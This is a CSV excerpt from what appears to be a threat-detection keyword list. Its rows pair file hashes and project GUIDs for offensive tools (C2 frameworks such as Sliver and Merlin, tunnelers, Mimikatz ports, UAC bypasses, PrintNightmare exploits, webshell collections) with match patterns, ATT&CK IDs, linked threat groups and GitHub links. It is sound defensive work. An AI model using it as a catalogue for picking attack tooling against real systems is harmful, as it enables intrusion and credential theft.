"*5f01ca453b976669370a3d5975837773107dd5522e8259dccda788993bb0da89*",".{0,1000}5f01ca453b976669370a3d5975837773107dd5522e8259dccda788993bb0da89.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","0","#filehash","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","27611"
"*5f01feb0f870564dae6ef4741dc3b0e200517ea1d712d095a67f4c84bc922bea*",".{0,1000}5f01feb0f870564dae6ef4741dc3b0e200517ea1d712d095a67f4c84bc922bea.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","27612"
"*5F026C27-F8E6-4052-B231-8451C6A73838*",".{0,1000}5F026C27\-F8E6\-4052\-B231\-8451C6A73838.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#GUIDproject","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","27613"
"*5F026C27-F8E6-4052-B231-8451C6A73838*",".{0,1000}5F026C27\-F8E6\-4052\-B231\-8451C6A73838.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27614"
"*5f026c27-f8e6-4052-b231-8451c6a73838*",".{0,1000}5f026c27\-f8e6\-4052\-b231\-8451c6a73838.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#GUIDproject","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","27615"
"*5F026C27-F8E6-4052-B231-8451C6A73838*",".{0,1000}5F026C27\-F8E6\-4052\-B231\-8451C6A73838.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#GUIDproject","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","27616"
"*5f27ca4597ebd322f8fca8f3f74a1771d0e5a3f2f9d53779345f73f62c9f5440*",".{0,1000}5f27ca4597ebd322f8fca8f3f74a1771d0e5a3f2f9d53779345f73f62c9f5440.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27619"
"*5f2c1a61ebef09dd554f3e9db1ae4bd1a516e69b39375948614573aa8e853cac*",".{0,1000}5f2c1a61ebef09dd554f3e9db1ae4bd1a516e69b39375948614573aa8e853cac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27621"
"*5f346d82d780b573ffd6e4ae1051dd96d10d5141d17535d5538ae8713096085b*",".{0,1000}5f346d82d780b573ffd6e4ae1051dd96d10d5141d17535d5538ae8713096085b.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","27623"
"*5f34b6621adfd6fcb5d9bed2972fc7f7409c04775ad1a11b396715784910ecef*",".{0,1000}5f34b6621adfd6fcb5d9bed2972fc7f7409c04775ad1a11b396715784910ecef.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","27624"
"*5f478850626a5b6b9fb2f8ffcdc4178424f4fc907f7879f1419e35963afb916c*",".{0,1000}5f478850626a5b6b9fb2f8ffcdc4178424f4fc907f7879f1419e35963afb916c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27628"
"*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*",".{0,1000}5F4DC47F\-7819\-4528\-9C16\-C88F1BE97EC5.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","#GUIDproject","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","27629"
"*5f54bd1d5ca340f7276bce27fe649e8465aaec2482a8db998de5b069d17633b3*",".{0,1000}5f54bd1d5ca340f7276bce27fe649e8465aaec2482a8db998de5b069d17633b3.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","27632"
"*5f62f9a20546e50fcb59aedca67b9fd9252c1c026ef81649bd9eb7366c4376aa*",".{0,1000}5f62f9a20546e50fcb59aedca67b9fd9252c1c026ef81649bd9eb7366c4376aa.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27634"
"*5f685def3707cb4737e0e520d86b05a0c7c7d973c9b0d26b89dddd9f1d615404*",".{0,1000}5f685def3707cb4737e0e520d86b05a0c7c7d973c9b0d26b89dddd9f1d615404.{0,1000}","offensive_tool_keyword","Invoke-RunAsSystem","A simple script to elevate current session to SYSTEM (needs to be run as Administrator)","T1548.002 - T1059.001","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Invoke-RunAsSystem","1","0","#filehash","N/A","8","1","14","1","2024-11-11T17:18:20Z","2023-08-24T15:12:40Z","27635"
"*5f76ace41e6efb7af838f936421f53fd66eed1efdcfde03950f3432816fadeed*",".{0,1000}5f76ace41e6efb7af838f936421f53fd66eed1efdcfde03950f3432816fadeed.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","27638"
"*5f7c2da21629fca7b712829f2d3579ef49af424cc00da2dfc1f4503afebf9eb0*",".{0,1000}5f7c2da21629fca7b712829f2d3579ef49af424cc00da2dfc1f4503afebf9eb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27639"
"*5f871566a9113e31357e084743f12b74b7199019e66cd10847b61b5666ecf9b1*",".{0,1000}5f871566a9113e31357e084743f12b74b7199019e66cd10847b61b5666ecf9b1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","#filehash","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","27641"
"*5f8801faa0e5801368ca51f92bf4483c663348465d00e300e0323c081833c8a3*",".{0,1000}5f8801faa0e5801368ca51f92bf4483c663348465d00e300e0323c081833c8a3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27643"
"*5f89dd30417c33eb50fb0bd4e375102ce4c0bb7932384eb7479665e7c7f3c8fe*",".{0,1000}5f89dd30417c33eb50fb0bd4e375102ce4c0bb7932384eb7479665e7c7f3c8fe.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27644"
"*5f8c475f1a4772644bbae8e3a31e11e78b7f44a1559f5e6bb58b7b3b9083323d*",".{0,1000}5f8c475f1a4772644bbae8e3a31e11e78b7f44a1559f5e6bb58b7b3b9083323d.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27645"
"*5f8fdd73abce168e8b44db54ad203a66d4983d1fd2563bb5922c0aaef9abc4ea*",".{0,1000}5f8fdd73abce168e8b44db54ad203a66d4983d1fd2563bb5922c0aaef9abc4ea.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","0","#filehash","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","27646"
"*5f9bb909c87cb452a6edbd9da0b5cfdd3f729d7393cf9f7f94e3b731503d072d*",".{0,1000}5f9bb909c87cb452a6edbd9da0b5cfdd3f729d7393cf9f7f94e3b731503d072d.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","27648"
"*5fa4acad2bf202e61149a7f47189c4d60ac2823ea26d0f449912ab9d28ad0806*",".{0,1000}5fa4acad2bf202e61149a7f47189c4d60ac2823ea26d0f449912ab9d28ad0806.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","27650"
"*5fa4acad2bf202e61149a7f47189c4d60ac2823ea26d0f449912ab9d28ad0806*",".{0,1000}5fa4acad2bf202e61149a7f47189c4d60ac2823ea26d0f449912ab9d28ad0806.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","27651"
"*5faa6197612a38b41bb54cbec6c782b5ea1bfb2da9ce236e493451de1b33ff47*",".{0,1000}5faa6197612a38b41bb54cbec6c782b5ea1bfb2da9ce236e493451de1b33ff47.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27653"
"*5FAC3991-D4FD-4227-B73D-BEE34EB89987*",".{0,1000}5FAC3991\-D4FD\-4227\-B73D\-BEE34EB89987.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","#GUIDproject","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","27654"
"*5FAE766D503C33AD0AE90520BFA0ADA54FFC6FF998B0542D1CF63D94B4126E3F*",".{0,1000}5FAE766D503C33AD0AE90520BFA0ADA54FFC6FF998B0542D1CF63D94B4126E3F.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","#filehash","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","27655"
"*5FB1809B-B0FD-48E9-9E47-3CB048369433*",".{0,1000}5FB1809B\-B0FD\-48E9\-9E47\-3CB048369433.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","27657"
"*5fb9e4e174759ac8d6d8fb6ac151bbe0d7564759d508c246c8c9b5eb4b28c8d7*",".{0,1000}5fb9e4e174759ac8d6d8fb6ac151bbe0d7564759d508c246c8c9b5eb4b28c8d7.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","27658"
"*5fb9f7c101e98f3fd5c011f47519f007fe5d19decf1ade2d36ed57f378b29042*",".{0,1000}5fb9f7c101e98f3fd5c011f47519f007fe5d19decf1ade2d36ed57f378b29042.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27659"
"*5fbee690299d3b057447b595c46845c34a1fe90a1e616fbb07bb5e0d019bc101*",".{0,1000}5fbee690299d3b057447b595c46845c34a1fe90a1e616fbb07bb5e0d019bc101.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27661"
"*5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619*",".{0,1000}5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27663"
"*5fd40c34131b8d6ea75e04630018ca96f144074e3d471d82c1226fe7356ef194*",".{0,1000}5fd40c34131b8d6ea75e04630018ca96f144074e3d471d82c1226fe7356ef194.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27665"
"*5fd654e8009f29c4f0137c797678d68065bb7a987a70a4437c99623de13d43f7*",".{0,1000}5fd654e8009f29c4f0137c797678d68065bb7a987a70a4437c99623de13d43f7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27666"
"*5fdc26ee180c18e799e436da359f24c54ebeb91cbb5206b89f3c82b0d28b93b5*",".{0,1000}5fdc26ee180c18e799e436da359f24c54ebeb91cbb5206b89f3c82b0d28b93b5.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27668"
"*5fdf6b4174877ef37a8f8dbb43fb9c1791e8c26da11ec86b6050c64ace740608*",".{0,1000}5fdf6b4174877ef37a8f8dbb43fb9c1791e8c26da11ec86b6050c64ace740608.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","27669"
"*5fe51276c79ff276e21dfdbf4d8e44cdc13a4d606668a8b89c0fdf7f42e37428*",".{0,1000}5fe51276c79ff276e21dfdbf4d8e44cdc13a4d606668a8b89c0fdf7f42e37428.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27670"
"*5FEB114B-49EC-4652-B29E-8CB5E752EC3E*",".{0,1000}5FEB114B\-49EC\-4652\-B29E\-8CB5E752EC3E.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#GUIDproject","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","27671"
"*5FEB114B-49EC-4652-B29E-8CB5E752EC3E*",".{0,1000}5FEB114B\-49EC\-4652\-B29E\-8CB5E752EC3E.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","0","#GUIDproject","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","27672"
"*5feea3420bc6019eda4db16b0c89d205ad258d54313782f236aacbf073bd33fa*",".{0,1000}5feea3420bc6019eda4db16b0c89d205ad258d54313782f236aacbf073bd33fa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27675"
"*5ff378d7374d099fefedb432a31052230322119401518b244a8b7b66415bc988*",".{0,1000}5ff378d7374d099fefedb432a31052230322119401518b244a8b7b66415bc988.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27676"
"*5ff6041ece711cce493b1f305eda3b9b619fee0df9061d6e324de131e7b2732b*",".{0,1000}5ff6041ece711cce493b1f305eda3b9b619fee0df9061d6e324de131e7b2732b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27677"
"*5ff663f155004fde14399555c5327e3a67f277574c115cea507ee2998746bd2d*",".{0,1000}5ff663f155004fde14399555c5327e3a67f277574c115cea507ee2998746bd2d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27678"
"*5ff9448bdad5a868174073bd76b1cbc27b434d1e54cb931d22258dd34ff6a7de*",".{0,1000}5ff9448bdad5a868174073bd76b1cbc27b434d1e54cb931d22258dd34ff6a7de.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27680"
"*5ffd03dd56f6f41ea426cca9bec8df3eee40a670204aca73a1d8a6dc076a3011*",".{0,1000}5ffd03dd56f6f41ea426cca9bec8df3eee40a670204aca73a1d8a6dc076a3011.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27681"
"*5ffd93d97e56861c46c562585d50dc820200763e633052b6a6d1e53566822cf8*",".{0,1000}5ffd93d97e56861c46c562585d50dc820200763e633052b6a6d1e53566822cf8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27682"
"*5fffcdd337374e2843c7582b798b983785da5ab3afb6e30b78cef4620d248b09*",".{0,1000}5fffcdd337374e2843c7582b798b983785da5ab3afb6e30b78cef4620d248b09.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27683"
